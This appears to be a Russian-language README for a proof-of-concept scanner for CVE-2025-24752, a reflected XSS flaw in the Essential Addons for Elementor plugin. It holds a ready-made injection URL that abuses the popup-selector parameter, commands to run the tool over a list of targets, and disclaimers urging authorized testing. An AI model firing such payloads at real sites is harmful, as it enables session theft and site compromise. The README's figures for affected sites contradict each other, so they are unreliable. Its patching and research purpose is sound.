
Привет, я Чираг Артани. Это POC отраженной XSS-уязвимости в Essential Addons for Elementor, затрагивающей более 2 миллионов сайтов - CVE-2025-24752
Этот инструмент предназначен только для исследований безопасности и целей исправления. Не используйте его для вреда сайтам. Если вы находите уязвимые сайты, сообщите об этом ответственно владельцам сайтов, чтобы они могли немедленно обновить их.
Отраженная XSS-уязвимость в Essential Addons for Elementor затрагивает более 100 000+ сайтов, использующих версии ниже 6.0.15. Ей присвоен CVE-2025-24752.
https://target.com/?popup-selector=<img_src=x_onerror=alert("chirag")>&eael-lostpassword=1

pip install selenium webdriver-manager
python poc.py targets.txt
В assets включен идеальный шаблон обнаружения для плагина: detect-elementor-for-xss.yaml
Уязвимость возникает из-за недостаточной проверки и очистки аргумента запроса popup-selector, позволяя вредоносному значению отражаться обратно пользователю. Исправлено в версии 6.0.15.
Подробнее: Статья Patchstack
Этот инструмент предоставляется только в образовательных и защитных целях. Всегда получайте надлежащее разрешение перед тестированием любого сайта на уязвимости. Автор не несет ответственности за неправильное использование этого инструмента.
Спасибо ответственным исследователям безопасности, которые выявили и сообщили об этой уязвимости.